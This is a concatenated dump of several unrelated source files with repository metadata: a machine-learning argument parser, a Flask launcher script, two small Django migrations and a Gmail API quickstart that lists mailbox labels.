ps("--allow_growth", dest="allow_growth", type=int, metavar='<int>',
default=0, help="Allow Growth")
ps("--dev_lr", dest='dev_lr', type=int,
metavar='<int>', default=0, help="Dev Learning Rate")
ps("--rnn_layers", dest="rnn_layers", type=int,
metavar='<int>', default=1, help="Number of RNN layers")
ps("--decay_epoch", dest="decay_epoch", type=int,
metavar='<int>', default=0, help="Decay everywhere n epochs")
ps("--num_proj", dest="num_proj", type=int, metavar='<int>',
default=1, help="Number of projection layers")
ps("--factor", dest="factor", type=int, metavar='<int>',
default=10, help="Number of factors (for FM model)")
ps("--dropout", dest="dropout", type=float, metavar='<float>',
default=0.8, help="The dropout probability.")
ps("--gen_lambda", dest="gen_lambda", type=float, metavar='<float>',
default=1.0, help="The generationg loss weight.")
ps("--rnn_dropout", dest="rnn_dropout", type=float, metavar='<float>',
default=0.8, help="The dropout probability.")
ps("--emb_dropout", dest="emb_dropout", type=float, metavar='<float>',
default=0.8, help="The dropout probability.")
ps("--pretrained", dest="pretrained", type=int, metavar='<int>',
default=0, help="Whether to use pretrained embeddings or not")
ps("--epochs", dest="epochs", type=int, metavar='<int>',
default=50, help="Number of epochs (default=50)")
ps('--gpu', dest='gpu', type=int, metavar='<int>',
default=0, help="Specify which GPU to use (default=0)")
ps("--hdim", dest='hdim', type=int, metavar='<int>',
default=30, help="Hidden layer size (default=50)")
ps("--lr", dest='learn_rate', type=float,
metavar='<float>', default=1E-3, help="Learning Rate")
ps("--clip_norm", dest='clip_norm', type=int,
metavar='<int>', default=1, help="Clip Norm value for gradients")
ps("--trainable", dest='trainable', type=int, metavar='<int>',
default=1, help="Trainable Word Embeddings (0|1)")
ps('--l2_reg', dest='l2_reg', type=float, metavar='<float>',
default=1E-6, help='L2 regularization, default=4E-6')
ps('--eval', dest='eval', type=int, metavar='<int>',
default=1, help='Epoch to evaluate results (default=1)')
ps('--log', dest='log', type=int, metavar='<int>',
default=1, help='1 to output to file and 0 otherwise')
ps('--dev', dest='dev', type=int, metavar='<int>',
default=1, help='1 for development set 0 to train-all')
ps('--seed', dest='seed', type=int, default=1337, help='random seed (not used)')
ps('--num_heads', dest='num_heads', type=int, default=1, help='number of heads')
ps("--hard", dest="hard", type=int, metavar='<int>',
default=1, help="Use hard att when using gumbel")
ps('--word_aggregate', dest='word_aggregate', type=str, default='MAX',
help='pooling type for key word loss')
ps("--average_embed", dest="average_embed", type=int, metavar='<int>',
default=1, help="Use average embedding of all reviews")
ps("--word_gumbel", dest="word_gumbel", type=int, metavar='<int>',
default=0, help="Use gumbel in the word(concept) level")
ps("--data_prepare", dest="data_prepare", type=int, metavar='<int>',
default=0, help="Data preparing type")
ps("--feed_rating", dest="feed_rating", type=int, metavar='<int>',
default=0, help="0 no feed, 1 feed groundtruth, 2 feed predicted rate")
ps("--masking", dest="masking", type=int, metavar='<int>',
default=1, help="Use masking and padding")
ps("--concept", dest="concept", type=int, metavar='<int>',
default=1, help="Use concept correlated components or not")
ps("--len_penalty", dest="len_penalty", type=int, metavar='<int>',
default=2, help="Regularization type for length balancing in beam search")
ps("--implicit", dest="implicit", type=int, metavar='<int>',
default=0, help="Use implicit factor or not")
ps("--category", dest="category", type=int, metavar='<int>',
default=0, help="Use item category factor or not")
ps("--heterougenous", dest="heterougenous", type=int, metavar='<int>',
default=0, help="Use item heterougenous factor or not")
ps("--att_reuse", dest="att_reuse", type=int, metavar='<int>',
default=0, help="Re-use attention or not")
ps('--tensorboard', action='store_true', help='To use tensorboard or not (may not work)')
ps('--early_stop', dest='early_stop', type=int,
metavar='<int>', default=5, help='early stopping')
ps('--wiggle_lr', dest='wiggle_lr', type=float,
metavar='<float>', default=1E-5, help='Wiggle lr')
ps('--wiggle_after', dest='wiggle_after', type=int,
metavar='<int>', default=0, help='Wiggle lr')
ps('--wiggle_score', dest='wiggle_score', type=float,
metavar='<float>', default=0.0, help='Wiggle score')
ps('--translate_proj', dest='translate_proj', type=int,
metavar='<int>', default=1, help='To translate project or not')
ps('--eval_train', dest='eval_train', type=int,
metavar='<int>', default=1, help='To eval on train set or not')
#ps('--data_link', dest='data_link', type=str, default='./data/City_4',
#ps('--data_link', dest='data_link', type=str, default='./data/City_7/new_5_City_7',
#ps('--data_link', dest='data_link', type=str, default='./data/City_2/clean_City_2',
#ps('--data_link', dest='data_link', type=str, default='./data/City_2/clean_4_City_2',
#ps('--data_link', dest='data_link', type=str, default='./data/City_2/clean_5_City_2',
#ps('--data_link', dest='data_link', type=str, default='./data/City_1/clean_City_1',
#ps('--data_link', dest='data_link', type=str, default='./data/City_1/clean_3_City_1',
#ps('--data_link', dest='data_link', type=str, default='./data/City_1/clean_4_City_1',
#ps('--data_link', dest='data_link', type=str, default='./data/City_1/clean_5_City_1',
#ps('--data_link', dest='data_link', type=str, default='./data/all_cities',
#ps('--data_link', dest='data_link', type=str, default='./data/City_4/clean_3_City_4',
#ps('--data_link', dest='data_link', type=str, default='./data/City_4/clean_4_City_4',
#ps('--data_link', dest='data_link', type=str, default='./data/City_5/clean_City_5',
ps('--data_link', dest='data_link', type=str, default='./data/City_4/clean_n_a_City_4',
#ps('--data_link', dest='data_link', type=str, default='./data/City_10/clean_City_10',
#ps('--data_link', dest='data_link', type=str, default='./data/City_4/clean_new_6_City_4',
#ps('--data_link', dest='data_link', type=str, default='./data/movie_100',
help='data link')
ps('--att_type', dest='att_type', type=str, default='SOFT',
help='attention type')
ps('--att_pool', dest='att_pool', type=str, default='MAX',
help='pooling type for attention')
ps('--word_pooling', dest='word_pooling', type=str, default='MEAN',
help='pooling type for word attention')
ps('--num_class', dest='num_class', type=int,
        default=2, help='self-explanatory (not used for recommendation)')
ps('--all_dropout', action='store_true',
default=True, help='to dropout the embedding layer or not')
ps("--qmax", dest="qmax", type=int, metavar='<int>',
default=40, help="Max Length of Question (not used in rec)")
ps("--char_max", dest="char_max", type=int, metavar='<int>',
default=4, help="Max length of characters")
ps("--amax", dest="amax", type=int, metavar='<int>',
default=40, help="Max Length for Answer (not used in rec)")
ps("--smax", dest="smax", type=int, metavar='<int>',
default=30, help="Max Length of Sentences (per review)")
ps("--gmax", dest="gmax", type=int, metavar='<int>',
default=30, help="Max Length of Generated Reviews (per review)")
ps("--dmax", dest="dmax", type=int, metavar='<int>',
default=20, help="Max Number of documents (or reviews)")
ps("--num_neg", dest="num_neg", type=int, metavar='<int>',
default=6, help="Number of negative samples for pairwise training")
ps('--base_encoder', dest='base_encoder',
default='GLOVE', help='BaseEncoder for hierarchical models')
ps("--init", dest="init", type=float,
metavar='<float>', default=0.01, help="Init Params")
ps("--temperature", dest="temperature", type=float,
metavar='<float>', default=0.5, help="Temperature")
ps("--num_inter_proj", dest="num_inter_proj", type=int,
metavar='<int>', default=6, help="Number of inter projection layers")
ps("--num_com", dest="num_com", type=int,
metavar='<int>', default=1, help="Number of compare layers")
ps("--show_att", dest="show_att", type=int,
metavar='<int>', default=0, help="Display Attention")
ps("--write_qual", dest="write_qual", type=int,
metavar='<int>', default=0, help="write qual")
ps("--show_affinity", dest="show_affinity", type=int,
metavar='<int>', default=0, help="Display Affinity Matrix")
ps("--init_type", dest="init_type", type=str,
metavar='<str>', default='xavier', help="Init Type")
ps("--decay_lr", dest="decay_lr", type=float,
metavar='<float>', default=0, help="Decay Learning Rate")
ps("--decay_steps", dest="decay_steps", type=float,
metavar='<float>', default=0, help="Decay Steps (manual)")
ps("--decay_stairs", dest="decay_stairs", type=float,
metavar='<float>', default=1, help="To use staircase or not")
ps('--emb_type', dest='emb_type', type=str,
default='glove', help='embedding type')
ps('--log_dir', dest='log_dir', type=str,
default='City_1_logs', help='log directory')
ps('--gen_dir', dest='gen_dir', type=str,
default='City_1_logs', help='gen rouge file directory')
    ps('--ref_dir', dest='ref_dir', type=str,
default='City_1_logs', help='ref rouge file directory')
ps('--model', dest='model', type=str,
default='City_1_logs', help='model path')
ps('--gen_true_dir', dest='gen_true_dir', type=str,
default='City_1_logs/explanation', help='gen true rouge file directory')
ps("--beam_size", dest="beam_size", type=int, metavar='<int>',
default=4, help="beam search size")
ps("--beam_number", dest="beam_number", type=int, metavar='<int>',
default=4, help="beam search number")
ps('--view_output', dest='view_output', type=str,
default='City_1_logs/explanation', help='view output')
#default='all_cities_logs/explanation', help='view output')
return parser
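# Usage sketch (illustrative values; the flag names above are the real interface):
#   parser = build_parser()
#   args = parser.parse_args(['--dataset', 'dianping', '--batch-size', '64'])
#   print(args.dataset, args.batch_size, args.rnn_type)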
|
[
"noreply@github.com"
] |
Complex-data.noreply@github.com
|
337372f50741ea51f7f9a1fac05e88744cbe730f
|
7ab39c3457f5a944d9b4c02c23a445a50d807671
|
/venv/bin/flask
|
343e32d48da97dc73bcd0fd3f23b32e009a71b48
|
[
"MIT"
] |
permissive
|
jmtroll/my-resume2
|
aa462668b9805b99e1df44e6b3aae798cd7480fa
|
1f11f664c06a1a676e66440b775bd2263e2420ce
|
refs/heads/master
| 2021-09-14T14:03:46.285614 | 2018-05-14T20:33:05 | 2018-05-14T20:33:05 | 112,559,431 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 269 |
#!/Users/jmtroll/Desktop/Misy350/python/songbase-1/songbase/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"jmtroll@udel.edu"
] |
jmtroll@udel.edu
|
|
445127e0bd4c9c2071af44bf50ed006f99fa6f0f
|
c1f285c7fe5ede34fa8b9ccc1e978faf719c2956
|
/borrowers/migrations/0006_auto_20200514_0707.py
|
5778619d30ea59f6fa69b7d1bd2176b115a82c74
|
[] |
no_license
|
tadiparChinese/ucpbciif
|
cb5d5f0f09e9d5c58226ea8606b0fd77834c7294
|
9dbb6e5f1639b220ff163a962b58b0e13b5e18d0
|
refs/heads/master
| 2023-03-21T21:41:26.872229 | 2021-03-04T03:12:54 | 2021-03-04T03:12:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 387 |
py
|
# Generated by Django 2.1.7 on 2020-05-14 07:07
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('borrowers', '0005_auto_20200513_0653'),
]
operations = [
migrations.RenameField(
model_name='standingcommittee',
old_name='yearsInCooop',
new_name='yearsInCoop',
),
]
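# RenameField only renames the column (yearsInCooop -> yearsInCoop);
# existing row data is preserved.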
|
[
"krystjyn.enriquez@gmail.com"
] |
krystjyn.enriquez@gmail.com
|
677767ca7ceb624e8d26a88b9ec1aea211c9eb4c
|
29f5b2d3a3582afad36ce03d23ac8e25743c7a1d
|
/quickstart.py
|
4e6bea7265daf75d13f0f31247acd9327aebbe9f
|
[] |
no_license
|
kylinRao/djangowebbuild
|
9b1e1f32ae8b8872e950ff91658296d92113597e
|
75a06b8e35d50176d824e3a4e790a79796c28f70
|
refs/heads/master
| 2021-01-19T04:32:49.411920 | 2016-06-08T01:33:38 | 2016-06-08T01:33:38 | 60,658,778 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,301 |
py
|
from __future__ import print_function
import httplib2
import os
from apiclient import discovery
import oauth2client
from oauth2client import client
from oauth2client import tools
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/gmail-python-quickstart.json
SCOPES = 'https://www.googleapis.com/auth/gmail.readonly'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Gmail API Python Quickstart'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'gmail-python-quickstart.json')
store = oauth2client.file.Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def main():
"""Shows basic usage of the Gmail API.
Creates a Gmail API service object and outputs a list of label names
of the user's Gmail account.
"""
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
service = discovery.build('gmail', 'v1', http=http)
results = service.users().labels().list(userId='me').execute()
labels = results.get('labels', [])
if not labels:
print('No labels found.')
else:
print('Labels:')
for label in labels:
print(label['name'])
if __name__ == '__main__':
main()
|
[
"975168367@qq.com"
] |
975168367@qq.com
|
6c5e70a7d16afe0964cf1c6742205d3fd6d8e7a4
|
ca24277734fc7a02d155f7d8b15e8e1b9888cef0
|
/Instagram/migrations/0012_post_likes.py
|
c02f54982bd3cb0614d8eec5eda9b084da4e7b9e
|
[] |
no_license
|
kvs-rajawat-bh/mtechProject
|
d64d574a1bbed732724707ecda275a9073dbe8ef
|
7042379e97bd4514f9ebda8e50e189e81cf20411
|
refs/heads/master
| 2020-04-21T11:24:09.214037 | 2019-02-12T04:17:32 | 2019-02-12T04:17:32 | 169,523,926 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 382 |
py
|
# Generated by Django 2.1.5 on 2019-02-11 20:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Instagram', '0011_auto_20190211_2150'),
]
operations = [
migrations.AddField(
model_name='post',
name='likes',
field=models.IntegerField(default=0),
),
]
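# AddField with default=0 backfills likes = 0 on every existing Post row.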
|
[
"kvs.rajawat.bh@gmail.com"
] |
kvs.rajawat.bh@gmail.com
|